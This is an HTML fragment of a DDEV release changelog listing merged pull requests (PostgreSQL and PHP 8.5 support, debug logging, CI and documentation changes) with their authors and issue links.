<li>feat(heidisql): allow postgres connections, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469508925" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7675" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7675/hovercard" href="https://github.com/ddev/ddev/issues/7675">#7675</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469596003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7677" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7677/hovercard" href="https://github.com/ddev/ddev/pull/7677">#7677</a></li>
<li>docs: explicitly mention setting system managed nvm version, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2204536474" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6013" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6013/hovercard" href="https://github.com/ddev/ddev/issues/6013">#6013</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JshGrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JshGrn">@JshGrn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536973192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7733" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7733/hovercard" href="https://github.com/ddev/ddev/pull/7733">#7733</a></li>
<li>refactor: remove Gitpod configuration and build infrastructure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3524650181" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7716" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7716/hovercard" href="https://github.com/ddev/ddev/pull/7716">#7716</a></li>
<li>test: try to make TestMutagenSimple slightly more reliable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536879176" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7732" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7732/hovercard" href="https://github.com/ddev/ddev/pull/7732">#7732</a></li>
<li>feat(debug): show web/db container logs on error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537552248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7736" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7736/hovercard" href="https://github.com/ddev/ddev/pull/7736">#7736</a></li>
<li>feat(xdebug): add xdebug_info() to <code>ddev xdebug info</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3521122107" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7715" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7715/hovercard" href="https://github.com/ddev/ddev/issues/7715">#7715</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530382931" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7721" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7721/hovercard" href="https://github.com/ddev/ddev/pull/7721">#7721</a></li>
<li>refactor: move <code>util.GetContainerUIDGid</code> to <code>dockerutil.GetContainerUser</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537335599" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7734" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7734/hovercard" href="https://github.com/ddev/ddev/pull/7734">#7734</a></li>
<li>refactor: simplify db volume chown, use WarningOnce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537527103" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7735" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7735/hovercard" href="https://github.com/ddev/ddev/pull/7735">#7735</a></li>
<li>fix: don't output debug or verbose in middle of doing json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3538113729" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7739" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7739/hovercard" href="https://github.com/ddev/ddev/pull/7739">#7739</a></li>
<li>feat(projectname): Allow defaulting to not setting name in config.yaml, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3442760295" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7648" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7648/hovercard" href="https://github.com/ddev/ddev/issues/7648">#7648</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530266952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7719" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7719/hovercard" href="https://github.com/ddev/ddev/pull/7719">#7719</a></li>
<li>ci(github-runner): use jlumbroso/free-disk-space action for cleanup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541300597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7744" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7744/hovercard" href="https://github.com/ddev/ddev/pull/7744">#7744</a></li>
<li>docs: Update postgres:18 in configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3542901917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7748" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7748/hovercard" href="https://github.com/ddev/ddev/pull/7748">#7748</a></li>
<li>style: add dark mode support for images/ddev-logo.svg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3545565065" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7752" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7752/hovercard" href="https://github.com/ddev/ddev/pull/7752">#7752</a></li>
<li>fix: Add healthcheck to xhgui image to resolve TestCmdXhgui intermittent failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541461422" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7745" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7745/hovercard" href="https://github.com/ddev/ddev/pull/7745">#7745</a></li>
<li>ci: run Linux tests separately, not in matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3542209899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7746" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7746/hovercard" href="https://github.com/ddev/ddev/pull/7746">#7746</a></li>
<li>feat(debug): show logs on error for all containers, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537552248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7736" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7736/hovercard" href="https://github.com/ddev/ddev/pull/7736">#7736</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544852702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7751" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7751/hovercard" href="https://github.com/ddev/ddev/pull/7751">#7751</a></li>
<li>test: Fix TestConfigValidate for TYPO3 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544373647" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7750" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7750/hovercard" href="https://github.com/ddev/ddev/pull/7750">#7750</a></li>
<li>feat: enable non-interactive mode for CI or non-tty environments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541024448" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7743" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7743/hovercard" href="https://github.com/ddev/ddev/pull/7743">#7743</a></li>
<li>test(apache-fpm): don't run tests with TYPO3, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544373647" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7750" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7750/hovercard" href="https://github.com/ddev/ddev/pull/7750">#7750</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548111606" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7755" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7755/hovercard" href="https://github.com/ddev/ddev/pull/7755">#7755</a></li>
<li>ci: sort golang imports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548210416" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7756" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7756/hovercard" href="https://github.com/ddev/ddev/pull/7756">#7756</a></li>
<li>ci(pull-push-providers): don't load 1Password secrets if env is empty by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548299986" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7757" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7757/hovercard" href="https://github.com/ddev/ddev/pull/7757">#7757</a></li>
<li>build(deps): bump actions/upload-artifact from 4 to 5 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3557397387" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7767" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7767/hovercard" href="https://github.com/ddev/ddev/pull/7767">#7767</a></li>
<li>chore(provider): remove trailing whitespace in YAML files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RobLoach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RobLoach">@RobLoach</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3562731610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7770" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7770/hovercard" href="https://github.com/ddev/ddev/pull/7770">#7770</a></li>
<li>feat: use composer_root in cakephp, craftcms, laravel, magento2, shopware6, symfony for app type detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352287272" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7558" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7558/hovercard" href="https://github.com/ddev/ddev/pull/7558">#7558</a></li>
<li>docs(docker-compose): improve mkcert install, how to add container user, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3510988124" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7709" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7709/hovercard" href="https://github.com/ddev/ddev/issues/7709">#7709</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3561208003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7769" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7769/hovercard" href="https://github.com/ddev/ddev/pull/7769">#7769</a></li>
<li>docs: remove duplicate TYPO3 quickstart tab, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552537945" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7763" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7763/hovercard" href="https://github.com/ddev/ddev/issues/7763">#7763</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552547226" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7764" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7764/hovercard" href="https://github.com/ddev/ddev/pull/7764">#7764</a></li>
<li>feat(describe): add ability to add custom info per service, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1966601560" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5469" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5469/hovercard" href="https://github.com/ddev/ddev/issues/5469">#5469</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530868809" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7723" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7723/hovercard" href="https://github.com/ddev/ddev/pull/7723">#7723</a></li>
<li>docs: migrate Vite Setup documentation into DDEV docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3245718672" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7466" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7466/hovercard" href="https://github.com/ddev/ddev/issues/7466">#7466</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419749017" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7625" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7625/hovercard" href="https://github.com/ddev/ddev/pull/7625">#7625</a></li>
<li>feat(upsun): use existing config instead of requiring environment variables [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3545696148" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7753" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7753/hovercard" href="https://github.com/ddev/ddev/pull/7753">#7753</a></li>
<li>docs(quickstart): Improve quickstarts to resolve problems with copy/paste by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552907495" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7765" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7765/hovercard" href="https://github.com/ddev/ddev/pull/7765">#7765</a></li>
<li>fix: improve username sanitization and add fallback handling, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3538080538" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7738" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7738/hovercard" href="https://github.com/ddev/ddev/issues/7738">#7738</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3540967315" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7742" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7742/hovercard" href="https://github.com/ddev/ddev/pull/7742">#7742</a></li>
<li>feat(diagnose): ddev utility diagnose feature, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2449046299" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6461" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6461/hovercard" href="https://github.com/ddev/ddev/issues/6461">#6461</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530377767" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7720" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7720/hovercard" href="https://github.com/ddev/ddev/pull/7720">#7720</a></li>
<li>docs: ignore drupal.org link 403'd by drupal [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572764587" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7772" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7772/hovercard" href="https://github.com/ddev/ddev/pull/7772">#7772</a></li>
<li>feat: add initial partial php8.5 support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488160347" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7697" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7697/hovercard" href="https://github.com/ddev/ddev/pull/7697">#7697</a></li>
<li>fix: use one.one.one.one to detect internet working by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572365705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7771" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7771/hovercard" href="https://github.com/ddev/ddev/pull/7771">#7771</a></li>
<li>test: use testcommon.CopyGlobalDdevDir to fix intermittent failures in TestCmdXHGui by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3551132191" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7761" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7761/hovercard" href="https://github.com/ddev/ddev/pull/7761">#7761</a></li>
<li>fix(debug): display offline warning only on <code>ddev start</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572365705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7771" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7771/hovercard" href="https://github.com/ddev/ddev/pull/7771">#7771</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3574835130" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7774" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7774/hovercard" href="https://github.com/ddev/ddev/pull/7774">#7774</a></li>
<li>fix(postgres): run as container user instead of uid 999 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3553862720" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7766" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7766/hovercard" href="https://github.com/ddev/ddev/pull/7766">#7766</a></li>
<li>feat: Add pre-share and post-share hooks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1741512164" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4962" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4962/hovercard" href="https://github.com/ddev/ddev/issues/4962">#4962</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3575533921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7777" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7777/hovercard" href="https://github.com/ddev/ddev/pull/7777">#7777</a></li>
<li>fix: add blackfire-php reconfiguration for older PHP versions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3576230118" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-platformsh/issues/142" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-platformsh/issues/142/hovercard" href="https://github.com/ddev/ddev-platformsh/issues/142">ddev/ddev-platformsh#142</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3577886976" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7778" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7778/hovercard" href="https://github.com/ddev/ddev/pull/7778">#7778</a></li>
<li>fix(describe): show service info when project is stopped, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955682508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7159" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7159/hovercard" href="https://github.com/ddev/ddev/issues/7159">#7159</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558374247" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7768" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7768/hovercard" href="https://github.com/ddev/ddev/pull/7768">#7768</a></li>
<li>build: bump docker-compose to v2.40.3, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470383991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7678" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7678/hovercard" href="https://github.com/ddev/ddev/issues/7678">#7678</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3577898753" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7779" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7779/hovercard" href="https://github.com/ddev/ddev/pull/7779">#7779</a></li>
<li>docs: add crosslink for shortened DDEV env variables to full list, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578440372" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7781" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7781/hovercard" href="https://github.com/ddev/ddev/issues/7781">#7781</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garvinhicking/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garvinhicking">@garvinhicking</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578442491" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7782" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7782/hovercard" href="https://github.com/ddev/ddev/pull/7782">#7782</a></li>
<li>test(quickstart): add disk cleanup before running tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578684092" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7783" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7783/hovercard" href="https://github.com/ddev/ddev/pull/7783">#7783</a></li>
<li>build(docker): bump images to v1.24.9 for release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578172220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7780" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7780/hovercard" href="https://github.com/ddev/ddev/pull/7780">#7780</a></li>
